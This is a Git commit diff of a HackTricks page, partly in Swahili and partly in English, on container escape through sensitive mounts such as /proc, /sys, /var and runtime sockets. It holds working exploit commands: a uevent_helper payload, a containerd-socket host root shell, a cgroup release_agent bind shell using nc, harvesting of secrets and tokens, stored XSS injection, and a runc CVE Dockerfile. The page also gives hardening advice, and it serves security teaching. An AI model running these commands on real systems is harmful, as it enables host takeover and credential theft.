maride/hacktricks
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks.git synced 2025-10-10 18:36:50 +00:00
Code Issues Packages Projects Releases Wiki Activity

Translated ['src/linux-hardening/privilege-escalation/docker-security/do

Browse Source
This commit is contained in:
Translator 2025-07-11 02:43:02 +00:00
parent cf94738c64
commit 07b800003e
1 changed files with 155 additions and 78 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

233
src/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/sensitive-mounts.md
View File

@ -2,7 +2,7 @@
{{#include ../../../../banners/hacktricks-training.md}}
Ufunuo wa `/proc`, `/sys`, na `/var` bila kutengwa kwa namespace kunaleta hatari kubwa za usalama, ikiwa ni pamoja na kuongezeka kwa uso wa shambulio na ufunuo wa taarifa. Maktaba haya yana faili nyeti ambazo, ikiwa zimepangwa vibaya au kufikiwa na mtumiaji asiyeidhinishwa, zinaweza kusababisha kutoroka kwa kontena, mabadiliko ya mwenyeji, au kutoa taarifa zinazosaidia mashambulizi zaidi. Kwa mfano, kuunganisha vibaya `-v /proc:/host/proc` kunaweza kupita ulinzi wa AppArmor kutokana na asili yake ya msingi wa njia, na kuacha `/host/proc` bila ulinzi.
Ufunuo wa `/proc`, `/sys`, na `/var` bila kutengwa kwa namespace kunaleta hatari kubwa za usalama, ikiwa ni pamoja na kuongezeka kwa uso wa shambulio na ufichuzi wa taarifa. Maktaba hizi zina faili nyeti ambazo, ikiwa zimepangwa vibaya au kufikiwa na mtumiaji asiyeidhinishwa, zinaweza kusababisha kutoroka kwa kontena, mabadiliko ya mwenyeji, au kutoa taarifa zinazosaidia mashambulizi zaidi. Kwa mfano, kuunganisha vibaya `-v /proc:/host/proc` kunaweza kupita ulinzi wa AppArmor kutokana na asili yake ya msingi wa njia, na kuacha `/host/proc` bila ulinzi.
**Unaweza kupata maelezo zaidi ya kila hatari inayoweza kutokea katika** [**https://0xn3va.gitbook.io/cheat-sheets/container/escaping/sensitive-mounts**](https://0xn3va.gitbook.io/cheat-sheets/container/escaping/sensitive-mounts)**.**
@ -15,7 +15,7 @@ Maktaba hii inaruhusu ufikiaji wa kubadilisha vigezo vya kernel, kawaida kupitia
#### **`/proc/sys/kernel/core_pattern`**
- Imeelezwa katika [core(5)](https://man7.org/linux/man-pages/man5/core.5.html).
- Ikiwa unaweza kuandika ndani ya faili hii inawezekana kuandika bomba `|` ikifuatiwa na njia ya programu au skripti ambayo itatekelezwa baada ya ajali kutokea.
- Ikiwa unaweza kuandika ndani ya faili hii inawezekana kuandika bomba `|` ikifuatiwa na njia ya programu au script ambayo itatekelezwa baada ya ajali kutokea.
- Mshambuliaji anaweza kupata njia ndani ya mwenyeji kwa kontena lake akitekeleza `mount` na kuandika njia ya binary ndani ya mfumo wa faili wa kontena lake. Kisha, angamiza programu ili kufanya kernel itekeleze binary nje ya kontena.
- **Mfano wa Upimaji na Ukatili**:
@ -49,8 +49,8 @@ ls -l $(cat /proc/sys/kernel/modprobe) # Angalia upatikanaji wa modprobe
#### **`/proc/sys/vm/panic_on_oom`**
- Imejumuishwa katika [proc(5)](https://man7.org/linux/man-pages/man5/proc.5.html).
- Bendera ya kimataifa inayodhibiti ikiwa kernel itakumbwa na hofu au kuanzisha OOM killer wakati hali ya OOM inapotokea.
- Imeelekezwa katika [proc(5)](https://man7.org/linux/man-pages/man5/proc.5.html).
- Bendera ya kimataifa inayodhibiti ikiwa kernel inapaswa kuanguka au kuitisha OOM killer wakati hali ya OOM inatokea.
#### **`/proc/sys/fs`**
@ -60,25 +60,25 @@ ls -l $(cat /proc/sys/kernel/modprobe) # Angalia upatikanaji wa modprobe
#### **`/proc/sys/fs/binfmt_misc`**
- Inaruhusu kujiandikisha kwa wakalimani wa fomati za binary zisizo za asili kulingana na nambari yao ya uchawi.
- Inaweza kusababisha kupanda kwa haki au upatikanaji wa shell ya mzizi ikiwa `/proc/sys/fs/binfmt_misc/register` inaweza kuandikwa.
- Ukatili unaohusiana na maelezo:
- [Poor man's rootkit kupitia binfmt_misc](https://github.com/toffan/binfmt_misc)
- Mafunzo ya kina: [Kiungo cha video](https://www.youtube.com/watch?v=WBC7hhgMvQQ)
- Inaweza kusababisha kupanda kwa haki au upatikanaji wa shell ya root ikiwa `/proc/sys/fs/binfmt_misc/register` inaweza kuandikwa.
- Uthibitisho wa husika na maelezo:
- [Poor man's rootkit via binfmt_misc](https://github.com/toffan/binfmt_misc)
- Mafunzo ya kina: [Video link](https://www.youtube.com/watch?v=WBC7hhgMvQQ)
### Wengine katika `/proc`
#### **`/proc/config.gz`**
- Inaweza kufichua usanidi wa kernel ikiwa `CONFIG_IKCONFIG_PROC` imewezeshwa.
- Inafaida kwa washambuliaji kubaini udhaifu katika kernel inayotumika.
- Inatumika kwa washambuliaji kubaini udhaifu katika kernel inayotumika.
#### **`/proc/sysrq-trigger`**
- Inaruhusu kuanzisha amri za Sysrq, ambayo inaweza kusababisha upya wa mfumo mara moja au vitendo vingine vya dharura.
- Inaruhusu kuitisha amri za Sysrq, ambayo inaweza kusababisha upya wa mfumo mara moja au hatua nyingine muhimu.
- **Mfano wa Kuanzisha Upya Mwenyeji**:
```bash
echo b > /proc/sysrq-trigger # Inarejesha mwenyeji
echo b > /proc/sysrq-trigger # Inaanzisha upya mwenyeji
```
#### **`/proc/kmsg`**
@ -90,19 +90,19 @@ echo b > /proc/sysrq-trigger # Inarejesha mwenyeji
- Inataja alama za kernel zilizotolewa na anwani zao.
- Muhimu kwa maendeleo ya mashambulizi ya kernel, hasa kwa kushinda KASLR.
- Taarifa za anwani zinapunguziliwa mbali ikiwa `kptr_restrict` imewekwa kuwa `1` au `2`.
- Taarifa za anwani zinapunguzwa ikiwa `kptr_restrict` imewekwa kuwa `1` au `2`.
- Maelezo katika [proc(5)](https://man7.org/linux/man-pages/man5/proc.5.html).
#### **`/proc/[pid]/mem`**
- Inashirikiana na kifaa cha kumbukumbu ya kernel `/dev/mem`.
- Inafanya kazi na kifaa cha kumbukumbu ya kernel `/dev/mem`.
- Kihistoria ilikuwa na udhaifu wa mashambulizi ya kupanda kwa haki.
- Zaidi kuhusu [proc(5)](https://man7.org/linux/man-pages/man5/proc.5.html).
#### **`/proc/kcore`**
- Inawakilisha kumbukumbu ya kimwili ya mfumo katika muundo wa ELF core.
- Kusoma kunaweza kuvuja maudhui ya kumbukumbu ya mfumo wa mwenyeji na kontena zingine.
- Inawakilisha kumbukumbu halisi ya mfumo katika muundo wa ELF core.
- Kusoma kunaweza kuvuja maudhui ya kumbukumbu ya mfumo wa mwenyeji na kontena nyingine.
- Ukubwa mkubwa wa faili unaweza kusababisha matatizo ya kusoma au kuanguka kwa programu.
- Matumizi ya kina katika [Dumping /proc/kcore in 2019](https://schlafwandler.github.io/posts/dumping-/proc/kcore/).
@ -113,8 +113,8 @@ echo b > /proc/sysrq-trigger # Inarejesha mwenyeji
#### **`/proc/mem`**
- Kiolesura mbadala kwa `/dev/mem`, kinawakilisha kumbukumbu ya kimwili.
- Inaruhusu kusoma na kuandika, kubadilisha kumbukumbu yote kunahitaji kutatua anwani za virtual hadi za kimwili.
- Kiolesura mbadala kwa `/dev/mem`, kinawakilisha kumbukumbu halisi.
- Inaruhusu kusoma na kuandika, kubadilisha kumbukumbu yote kunahitaji kutatua anwani za virtual hadi halisi.
#### **`/proc/sched_debug`**
@ -131,83 +131,89 @@ echo b > /proc/sysrq-trigger # Inarejesha mwenyeji
#### **`/sys/kernel/uevent_helper`**
- Inatumika kwa kushughulikia `uevents` za kifaa cha kernel.
- Kuandika kwenye `/sys/kernel/uevent_helper` kunaweza kutekeleza skripti zisizo za kawaida wakati wa kuanzisha `uevent`.
- **Mfano wa Ukatili**: %%%bash
- Kuandika kwenye `/sys/kernel/uevent_helper` kunaweza kutekeleza skripti zisizo na mipaka wakati wa kuanzisha `uevent`.
- **Mfano wa Ukatili**:
```bash
#### Inaunda payload
#### Creates a payload
echo "#!/bin/sh" > /evil-helper echo "ps > /output" >> /evil-helper chmod +x /evil-helper
#### Inapata njia ya mwenyeji kutoka OverlayFS mount kwa kontena
#### Finds host path from OverlayFS mount for container
host*path=$(sed -n 's/.*\perdir=(\[^,]\_).\*/\1/p' /etc/mtab)
#### Inapanga uevent_helper kwa msaidizi mbaya
#### Sets uevent_helper to malicious helper
echo "$host_path/evil-helper" > /sys/kernel/uevent_helper
#### Inasababisha uevent
#### Triggers a uevent
echo change > /sys/class/mem/null/uevent
#### Inasoma matokeo
#### Reads the output
cat /output %%%
cat /output
```
#### **`/sys/class/thermal`**
- Inadhibiti mipangilio ya joto, ambayo inaweza kusababisha mashambulizi ya DoS au uharibifu wa kimwili.
- Controls temperature settings, potentially causing DoS attacks or physical damage.
#### **`/sys/kernel/vmcoreinfo`**
- Inavuja anwani za kernel, ambayo inaweza kuhatarisha KASLR.
- Leaks kernel addresses, potentially compromising KASLR.
#### **`/sys/kernel/security`**
- Inashikilia kiolesura cha `securityfs`, kinachoruhusu usanidi wa Moduli za Usalama za Linux kama AppArmor.
- Upatikanaji unaweza kuwezesha kontena kuzima mfumo wake wa MAC.
- Houses `securityfs` interface, allowing configuration of Linux Security Modules like AppArmor.
- Access might enable a container to disable its MAC system.
#### **`/sys/firmware/efi/vars` na `/sys/firmware/efi/efivars`**
#### **`/sys/firmware/efi/vars` and `/sys/firmware/efi/efivars`**
- Inafichua violesura vya kuingiliana na mabadiliko ya EFI katika NVRAM.
- Usanidi mbaya au ukatili unaweza kusababisha kompyuta za mkononi zisizoweza kuanzishwa au mashine za mwenyeji zisizoweza kuanzishwa.
- Exposes interfaces for interacting with EFI variables in NVRAM.
- Misconfiguration or exploitation can lead to bricked laptops or unbootable host machines.
#### **`/sys/kernel/debug`**
- `debugfs` inatoa kiolesura cha ufuatiliaji "bila sheria" kwa kernel.
- Historia ya masuala ya usalama kutokana na asili yake isiyo na mipaka.
- `debugfs` offers a "no rules" debugging interface to the kernel.
- History of security issues due to its unrestricted nature.
### Udhihirisho wa `/var`
### `/var` Vulnerabilities
Folda ya mwenyeji ya **/var** ina soketi za wakati wa kontena na mifumo ya faili ya kontena.
Ikiwa folda hii imepandishwa ndani ya kontena, kontena hiyo itapata upatikanaji wa kusoma-kandika kwa mifumo ya faili ya kontena zingine
ikiwa na haki za mzizi. Hii inaweza kutumika vibaya kuhamasisha kati ya kontena, kusababisha kukatizwa kwa huduma, au kuingiza nyuma kontena nyingine na programu zinazotumika ndani yao.
The host's **/var** folder contains container runtime sockets and the containers' filesystems.
If this folder is mounted inside a container, that container will get read-write access to other containers' file systems
with root privileges. This can be abused to pivot between containers, to cause a denial of service, or to backdoor other
containers and applications that run in them.
#### Kubernetes
Ikiwa kontena kama hii imewekwa na Kubernetes:
If a container like this is deployed with Kubernetes:
```yaml
apiVersion: v1
kind: Pod
metadata:
name: pod-mounts-var
labels:
app: pentest
spec:
containers:
- name: pod-mounts-var-folder
image: alpine
volumeMounts:
- mountPath: /host-var
name: noderoot
command: [ "/bin/sh", "-c", "--" ]
args: [ "while true; do sleep 30; done;" ]
volumes:
- name: noderoot
hostPath:
path: /var
apiVersion: v1
kind: Pod
metadata:
name: pod-mounts-var
labels:
app: pentest
spec:
containers:
- name: pod-mounts-var-folder
image: alpine
volumeMounts:
- mountPath: /host-var
name: noderoot
command: [ "/bin/sh", "-c", "--" ]
args: [ "while true; do sleep 30; done;" ]
volumes:
- name: noderoot
hostPath:
path: /var
```
Ndani ya **pod-mounts-var-folder** chombo:
Inside the **pod-mounts-var-folder** container:
```bash
/ # find /host-var/ -type f -iname '*.env*' 2>/dev/null
@ -225,20 +231,22 @@ REFRESH_TOKEN_SECRET=14<SNIP>ea
/host-var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/140/fs/usr/share/nginx/html/index.html
/host-var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/132/fs/usr/share/nginx/html/index.html
/ # echo '<!DOCTYPE html><html lang="en"><head><script>alert("Stored XSS!")</script></head></html>' > /host-var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/140/fs/usr/sh
are/nginx/html/index2.html
/ # echo '<!DOCTYPE html><html lang="sw"><head><script>alert("Stored XSS!")</script></head></html>' > /host-var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/140/fs/usr/share/nginx/html/index2.html
```
The XSS ilifikiwa:
The XSS was achieved:
![Stored XSS via mounted /var folder](/images/stored-xss-via-mounted-var-folder.png)
Kumbuka kwamba kontena HALIHITAJI kuanzishwa upya au chochote. Mabadiliko yoyote yaliyofanywa kupitia folda iliyowekwa **/var** yatafanyika mara moja.
Note that the container DOES NOT require a restart or anything. Any changes made via the mounted **/var** folder will be applied instantly.
Unaweza pia kubadilisha faili za usanidi, binaries, huduma, faili za programu, na profaili za shell ili kufikia RCE ya kiotomatiki (au ya nusu-kiotomatiki).
You can also replace configuration files, binaries, services, application files, and shell profiles to achieve automatic (or semi-automatic) RCE.
##### Ufikiaji wa hati za wingu
##### Access to cloud credentials
The container can read K8s serviceaccount tokens or AWS webidentity tokens
which allows the container to gain unauthorized access to K8s or cloud:
Kontena linaweza kusoma tokens za K8s serviceaccount au tokens za AWS webidentity ambazo zinamruhusu kontena kupata ufikiaji usioidhinishwa kwa K8s au wingu:
```bash
/ # find /host-var/ -type f -iname '*token*' 2>/dev/null | grep kubernetes.io
/host-var/lib/kubelet/pods/21411f19-934c-489e-aa2c-4906f278431e/volumes/kubernetes.io~projected/kube-api-access-64jw2/..2025_01_22_12_37_42.4197672587/token
@ -247,31 +255,100 @@ Kontena linaweza kusoma tokens za K8s serviceaccount au tokens za AWS webidentit
/host-var/lib/kubelet/pods/01c671a5-aaeb-4e0b-adcd-1cacd2e418ac/volumes/kubernetes.io~projected/aws-iam-token/..2025_01_22_03_45_56.2328221474/token
/host-var/lib/kubelet/pods/5fb6bd26-a6aa-40cc-abf7-ecbf18dde1f6/volumes/kubernetes.io~projected/kube-api-access-fm2t6/..2025_01_22_12_25_25.3018586444/token
```
#### Docker
Ushirikiano katika Docker (au katika matumizi ya Docker Compose) ni sawa kabisa, isipokuwa kwamba kawaida
faili za mifumo ya faili ya kontena nyingine zinapatikana chini ya njia tofauti ya msingi:
The exploitation in Docker (or in Docker Compose deployments) is exactly the same, except that usually
the other containers' filesystems are available under a different base path:
```bash
$ docker info | grep -i 'docker root\|storage driver'
Storage Driver: overlay2
Docker Root Dir: /var/lib/docker
Dereva ya Hifadhi: overlay2
Dir ya Mzizi ya Docker: /var/lib/docker
```
Hivyo mifumo ya faili iko chini ya `/var/lib/docker/overlay2/`:
So the filesystems are under `/var/lib/docker/overlay2/`:
```bash
$ sudo ls -la /var/lib/docker/overlay2
drwx--x--- 4 root root 4096 Jan 9 22:14 00762bca8ea040b1bb28b61baed5704e013ab23a196f5fe4758dafb79dfafd5d
drwx--x--- 4 root root 4096 Jan 11 17:00 03cdf4db9a6cc9f187cca6e98cd877d581f16b62d073010571e752c305719496
drwx--x--- 4 root root 4096 Jan 9 21:23 049e02afb3f8dec80cb229719d9484aead269ae05afe81ee5880ccde2426ef4f
drwx--x--- 4 root root 4096 Jan 9 21:22 062f14e5adbedce75cea699828e22657c8044cd22b68ff1bb152f1a3c8a377f2
drwx--x--- 4 root root 4096 Jan 9 22:14 00762bca8ea040b1bb28b61baed5704e013ab23a196f5fe4758dafb79dfafd5d
drwx--x--- 4 root root 4096 Jan 11 17:00 03cdf4db9a6cc9f187cca6e98cd877d581f16b62d073010571e752c305719496
drwx--x--- 4 root root 4096 Jan 9 21:23 049e02afb3f8dec80cb229719d9484aead269ae05afe81ee5880ccde2426ef4f
drwx--x--- 4 root root 4096 Jan 9 21:22 062f14e5adbedce75cea699828e22657c8044cd22b68ff1bb152f1a3c8a377f2
<SNIP>
```
#### Kumbuka
Njia halisi zinaweza kutofautiana katika mipangilio tofauti, ndiyo maana njia bora ni kutumia amri ya **find** kutafuta mifumo ya faili ya kontena nyingine na tokeni za SA / utambulisho wa wavuti.
#### Note
### Marejeleo
The actual paths may differ in different setups, which is why your best bet is to use the **find** command to
locate the other containers' filesystems and SA / web identity tokens
### Other Sensitive Host Sockets and Directories (2023-2025)
Mounting certain host Unix sockets or writable pseudo-filesystems is equivalent to giving the container full root on the node. **Treat the following paths as highly sensitive and never expose them to untrusted workloads**:
```text
/run/containerd/containerd.sock # socket ya containerd CRI
/var/run/crio/crio.sock # socket ya CRI-O runtime
/run/podman/podman.sock # API ya Podman (ya mizizi au isiyo na mizizi)
/var/run/kubelet.sock # API ya Kubelet kwenye nodi za Kubernetes
/run/firecracker-containerd.sock # Kata / Firecracker
```
Attack example abusing a mounted **containerd** socket:
```bash
# ndani ya kontena (socket imewekwa kwenye /host/run/containerd.sock)
ctr --address /host/run/containerd.sock images pull docker.io/library/busybox:latest
ctr --address /host/run/containerd.sock run --tty --privileged --mount \
type=bind,src=/,dst=/host,options=rbind:rw docker.io/library/busybox:latest host /bin/sh
chroot /host /bin/bash # shell kamili ya root kwenye mwenyeji
```
A similar technique works with **crictl**, **podman** or the **kubelet** API once their respective sockets are exposed.
Writable **cgroup v1** mounts are also dangerous. If `/sys/fs/cgroup` is bind-mounted **rw** and the host kernel is vulnerable to **CVE-2022-0492**, an attacker can set a malicious `release_agent` and execute arbitrary code in the *initial* namespace:
```bash
# assuming the container has CAP_SYS_ADMIN and a vulnerable kernel
mkdir -p /tmp/x && echo 1 > /tmp/x/notify_on_release
echo '/tmp/pwn' > /sys/fs/cgroup/release_agent # requires CVE-2022-0492
echo -e '#!/bin/sh\nnc -lp 4444 -e /bin/sh' > /tmp/pwn && chmod +x /tmp/pwn
sh -c "echo 0 > /tmp/x/cgroup.procs" # triggers the empty-cgroup event
```
When the last process leaves the cgroup, `/tmp/pwn` runs **as root on the host**. Patched kernels (>5.8 with commit `32a0db39f30d`) validate the writers capabilities and block this abuse.
### Mount-Related Escape CVEs (2023-2025)
* **CVE-2024-21626 runc “Leaky Vessels” file-descriptor leak**
runc ≤1.1.11 leaked an open directory file descriptor that could point to the host root. A malicious image or `docker exec` could start a container whose *working directory* is already on the host filesystem, enabling arbitrary file read/write and privilege escalation. Fixed in runc 1.1.12 (Docker ≥25.0.3, containerd ≥1.7.14).
```Dockerfile
FROM scratch
WORKDIR /proc/self/fd/4 # 4 == "/" on the host leaked by the runtime
CMD ["/bin/sh"]
```
* **CVE-2024-23651 / 23653 BuildKit OverlayFS copy-up TOCTOU**
A race condition in the BuildKit snapshotter let an attacker replace a file that was about to be *copy-up* into the containers rootfs with a symlink to an arbitrary path on the host, gaining write access outside the build context. Fixed in BuildKit v0.12.5 / Buildx 0.12.0. Exploitation requires an untrusted `docker build` on a vulnerable daemon.
### Hardening Reminders (2025)
1. Bind-mount host paths **read-only** whenever possible and add `nosuid,nodev,noexec` mount options.
2. Prefer dedicated side-car proxies or rootless clients instead of exposing the runtime socket directly.
3. Keep the container runtime up-to-date (runc ≥1.1.12, BuildKit ≥0.12.5, containerd ≥1.7.14).
4. In Kubernetes, use `securityContext.readOnlyRootFilesystem: true`, the *restricted* PodSecurity profile and avoid `hostPath` volumes pointing to the paths listed above.
### References
- [runc CVE-2024-21626 advisory](https://github.com/opencontainers/runc/security/advisories/GHSA-xr7r-f8xq-vfvv)
- [Unit 42 analysis of CVE-2022-0492](https://unit42.paloaltonetworks.com/cve-2022-0492-cgroups/)
- [https://0xn3va.gitbook.io/cheat-sheets/container/escaping/sensitive-mounts](https://0xn3va.gitbook.io/cheat-sheets/container/escaping/sensitive-mounts)
- [Understanding and Hardening Linux Containers](https://research.nccgroup.com/wp-content/uploads/2020/07/ncc_group_understanding_hardening_linux_containers-1-1.pdf)
- [Abusing Privileged and Unprivileged Linux Containers](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2016/june/container_whitepaper.pdf)